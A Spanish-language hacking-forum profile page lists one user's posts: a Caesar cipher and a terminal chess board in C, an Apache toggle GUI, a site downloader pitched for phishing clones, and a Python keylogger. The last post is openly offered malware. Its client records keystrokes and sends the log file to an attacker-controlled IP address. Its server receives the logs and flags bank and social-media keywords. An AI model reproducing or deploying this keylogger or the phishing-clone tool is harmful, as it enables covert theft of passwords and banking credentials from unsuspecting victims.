Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Zackonit

#1
C / C++ / Cifrado cesar con C
Mayo 10, 2022, 02:32:56 AM
Buenas tardes sean a todos , pues he estado viendo muchos cifrados en internet pero ninguno me convence o de plano para lo que recien se inician en el lenguaje C es complicado de leer ,asi que les traigo el cifrado cesar usando arrays
y punteros ,pueden mejorar el codigo y ponerlo abajo el objetivo de esto es aprender tecnicas

Bueno mucho blablabla ,aqui el code

Código: c
#include <stdio.h>

void caesarCipher(int key, char *keyword,int size);

int main(int argc,char const *argv[]){
        char msg[4] = "hola";
        char *keyword = &msg;
        caesarCipher(3,keyword,4);
        return 0;
}

void caesarCipher(int key ,char *keyword,int size){
        char abc[26] = {'a','b','c','d','e',
                        'f','g','h','i','j',
                        'k','l','m','n','o',
                        'p','q','r','s','t',
                        'u','v','w','x','y',
                        'z'};
    int buffersize = sizeof(abc)/sizeof(abc[0]);
    int z=0;

    for(int i=0;i<size;i++){
        for(int j=0;j<buffersize;j++){
            if(keyword[i] == abc[j]){
              z = j+key;
                  printf("%c",abc[z]);          
              if(z > buffersize){
                  printf("%c",abc[z-buffersize]);

              } 
            } 
        }
    }
}


#2
Hacking / Tablero de Ajedrez en C [Dev-time]
Marzo 17, 2022, 09:14:43 PM
Código: c


#include <stdio.h>
#include <curses.h>
[color=green]
#define ANSI_COLOR_GREEN   "\x1b[32m"
#define ANSI_COLOR_RESET   "\x1b[0m"[/color]

int generate(int range);
char chess(int row,int col);

int main(int argc,char const *argv[]){
    printf(ANSI_COLOR_GREEN   "\tH4CK3R CH355 v0.01 \n \tby: | @zackonit |"   ANSI_COLOR_RESET "\n");
printf("\n");
printf("\n size : %i bits \n",chess(8,8));
//generate(3);
return 0;
}

char chess(int row,int col){
//podriamos usar numeros pares para rellenar
//los cuadros
//int int_pair(1,COLOR RED, COLOR GREEN);
    int size = row * col;

for(int i=0;i<row;i++){
for(int k=0;k<col;k++){
//pawn
if(i == 1 || i == row-2){
printf(" ♙ ");
}
else if(i == 0 && k == 0 || i == 7 && k == 0
|| i == 0 && k == 7 || i == 7 &&
k == 7){
printf(" ♖ ");
}
else if(i == 0 && k == 1
|| i == 7 && k == 1
|| i == 0 && k == 6
|| i == 7 && k == 6 ){
printf(" ♘ ");
}else if(i == 0 && k== 2
|| i == 0 && k == 5
|| i == 7 && k == 2 ||
i == 7 && k == 5 ){
printf(" ♗ ");
}
else if(i == 0 && k == 4
|| i == 7 && k ==4){
//QUEEN
printf(" ♕ ");
}
else if(i == 0 && k == 3 ||
        i == 7 && k == 3){
printf(" ♔ ");
}
else{
printf( ANSI_COLOR_GREEN   " 0 "   ANSI_COLOR_RESET );
}
}
printf("\n");
}
    return size;
}
#3
Hacking / WebScraping ,Descargar un sitio web COMPLETO
Agosto 20, 2021, 03:37:04 AM
El dia de hoy quiero mostrarles como descargar un sitio web completo ,usando tecnicas de WEB SCRAPING

Con esta herramienta puedes descargar un sitio de redes sociales como facebook,twitter etc ,para poder suplantar la identidad con tecnicas de ARP SPOOFING O PHISHING

Espero que sea de su agrado , @zackonit


Código: python
import requests

catch = []

def GET_SECT():
    website = input('[GET-HTTPS] ')
    META_HEAD = input('[FILENAME.html] ')
    return website,META_HEAD


class DownloadSites:
    def __init__(self,website):
        self.website = website
        self.EXTENSION = ['.html']
       
    def httpsRequest(self):
        self.request = requests.get(self.website)
        return self.website

    def BuildSite(self,meta_title):
        with open(meta_title+self.EXTENSION[0],'wb') as META_HEAD:
            META_HEAD.write(self.request.text.encode('UTF-8'))
            return "[SUCCESS] +200 <HTTP_REQUEST>"


if __name__ == "__main__":
    statement = GET_SECT()
    catch.append(statement) #save outputs

    ScrappySite = DownloadSites(statement[0])
    print(ScrappySite.httpsRequest())
    print(ScrappySite.BuildSite(statement[1]))


#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que onda banda , he estado algo ausente estos utlimos meses pero vengo a enseñarles una aplicacion que hice el dia de ayer .Hice una aplicación para
encender el servidor apache en 127.0.0.1 , claramente este script funciona para sistemas Linux

DISFRUTENLO PARA UNDERCODE :3
Código: python

import subprocess
from tkinter import *

class Apache_services():
    def __init__(self,window,dimensions='500x500'):
        self.window = Tk()
        self.dimensions = dimensions

    def Apache_root_services(self):
        self.window.title('@Apache service ~zackonit')
        self.window.geometry(self.dimensions)
        self.window.resizable(0,0)
        self.fonty = ("Verdana",24)

        self.INSERT = Label(text="Apache Service 127.0.0.1",
        fg="yellow" ,bg="black",font=self.fonty).pack()

        self.window.configure(background='black')
        '''Recovery buttons'''
        self.service = Label(self.window,text="Open Linux local server",
                             fg='red', bg="black").place(x=25,y=65)

        self.info = Button(self.window,text="Open",bg="green",fg="white",command=self.openLinux_service).place(x=228,y=55)
        self.down = Button(self.window,text="Down" ,bg="red" ,fg="white",command=self.downLinux_service).place(x=328,y=55)

        self.footer =  Label(self.window, text='Development @zackonit',bg="yellow" ,fg="black",width=65, height=3).place(x=1,y=440)

    def openLinux_service(self,unlock='sudo /opt/lampp/lampp start',fail='sudo /etc/init.d/apache2 stop'):
        self.main = subprocess.check_output(fail,subprocess.STDOUT,shell=True)
        self.opt_command = subprocess.check_output(unlock,subprocess.STDOUT,shell=True)
        self.output = Label(text=self.opt_command,fg="blue" ,bg="black",width="50").place(x=15,y=125) 
       
    def downLinux_service(self,down_track='sudo /opt/lampp/lampp stop'):
        self.stoplinux = subprocess.check_output(down_track ,subprocess.STDOUT,shell=True)
        self.out = Label(text=self.stoplinux,fg="violet",bg="black",width="50").place(x=5,y=123)

        self.config = subprocess.check_output('figlet ImHackerEnterMyW0rld',subprocess.STDOUT,shell=True)
        self.ifconfig = Label(text=self.config ,fg="white" ,bg="black").place(x=5,y=210)
       

if __name__ == "__main__":
    apache_services = Apache_services(None)
    apache_services.Apache_root_services()

    apache_services.openLinux_service()
    apache_services.downLinux_service()






#5
Hola mi nick es Zackonit y he estado desarrollando un keylogger que detecta palabras clave como facebook,twitter,pornhub ETC. 

Del lado del servidor ,que seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es quien recibe los datos del vector1 que funciona cuando el mismo llena con sus tecleos a un 1kb o  puedes modificarlo sea tu caso. Tambien subire como reprogramarlo en una PIC de microcontrolador para que finga ser una memoria usb pero eso es despues xD.

Para poder ejecutarlo seria excitar el Servidor -> python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -v 192.168.x.x -t 8080 -l 2 -f file_system


que seria -v el vector principal o sea tu direccion ip
                -t el puerto con que quieres hacer el tunel de conexion
               -l las conexiones que quieres tener
               -f el nombre del archivo que quieres ver


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
CABE DESTACAR QUE EL MODULO LEDs es mi libreria de colores xD jeje

DESPUES SUBIRE OTRA ACTULIZACION DE ESTE MALWARE PARA QUE SEA MAS COMODO ,EMPLEARE UNA INTERFAZ GRAFICA POR QUE
HASTA AMI ME DUELEN LOS OJOS DE USAR TODO EL DIA LA CONSOLA XD

Código: python


import socket,threading
from LEDs import matrix_photons
from time import strftime
import optparse,sys

vectorBreakpoint = ['www.facebook.com','www.twitter.com',
                    'www.reddit.com','www.pornhub.com',
                    'www.santander.com','www.bancomer.com',
                    'www.bbva.com',"face","twi","ban"]

class threadingConnections:
    def intervalSocket(self,ipVector,target,lkive,file_system):
        self.socket_Family=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.file_system=file_system
        self.socket_Family.bind((ipVector,target))
        print(strftime('[%I:%M:%S] ')+'AF_INET: '+ ipVector,'target:',target,'\n',self.socket_Family)
        self.socket_Family.listen(lkive)
       
        self.connections,self.system_Addr=self.socket_Family.accept()
        print(strftime('[%I:%M:%S] ')+"intercept: %s Country: %s range: %s size:kbs(4b)" %(self.system_Addr[0],"Mexico","4"))
        self.info_size=self.connections.recv(2**10).decode("utf-8")
   
    def intoxicateFile_system(self,hexabytes=4096):
        with open(self.file_system,'w') as self.bytes_k:
            self.bytes_k.write(self.info_size)
            self.bytes_k.close()
       
        with open(self.file_system) as x:
            for line in x:
                for fx in vectorBreakpoint:
                    if fx in line:
                        msg=strftime('[%I:%M:%S] ')+"Intercept: %s in %s Country: %s" %(fx,self.system_Addr[0],"México[MEX]")
                        msg=str(msg)
                        matrix_photons.matrix_reaction(True,msg,"w")
                        print(self.socket_Family)
                       
        y=input("[*]Watch Information(Y/N): ")
        if y == 'y'.upper():
            print(self.info_size)
        else:
            self.socket_Family.close()
            sys.exit()
           


args=optparse.OptionParser()

args.add_option("-v","--ip",dest="ipVector",help="Example: 192.168.1.x")
args.add_option("-t","--target",dest="target",type="int",help="Example: target=8080")
args.add_option("-l","--live",dest="lkive",type="int",help="Example: listen(2)")
args.add_option("-f","--filesystem",dest="file_system",help="Example: args(0)")

(options,arguments) = args.parse_args()

ipVector = options.ipVector
target=options.target
lkive=options.lkive
file_system=options.file_system

if __name__ == "__main__":
    threadsSTREAM=threadingConnections()
    if ipVector == None and target == None and lkive == None and file_system==None:
        print("Error: Not parameters in function f(x)")
       
    else:
        threadsSTREAM.intervalSocket(ipVector,target,lkive,file_system)
        threadsSTREAM.intoxicateFile_system()



Código: python



import socket,os,sys
from pynput.keyboard import Listener

class keywor0ds_Ward:
     unicodeGlobal = ["UTF-8"]
     
root = "CryptWin.txt"
limit_kilobytes = 1000 # 1kb or 1 kilobyte

Dark_address, tunnel_port = "192.168.1.72",8080


# si el token es 1 entoces se abre la conexion
# el logger se transforma en string
# abre el archvio y escribe sobre el

#se cifra el archivo
#toma captura de la pantalla
#envia el archivo cifrado


class AsignMasterCipherIV:
    def masterCipher_logger(self,logger):
        xyzIV = str(logger)
        xyzIV = xyzIV.replace("'","")
       
        with open(root,"a") as k:
            k.write(xyzIV)


        if os.stat(root).st_size >= limit_kilobytes:
            DarkSocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            DarkSocket.connect((Dark_address,tunnel_port))
           
            with open(root,"r") as rootRead:
                digitalBytes = rootRead.read()
               
            DarkSocket.send(bytes(digitalBytes.encode(keywor0ds_Ward.unicodeGlobal[0])))
            sys.exit()
       
        else:
            pass

if __name__ == "__main__":
    handler_master=AsignMasterCipherIV()
    with Listener(on_press=handler_master.masterCipher_logger(True)) as MultiWriter:
        MultiWriter.join()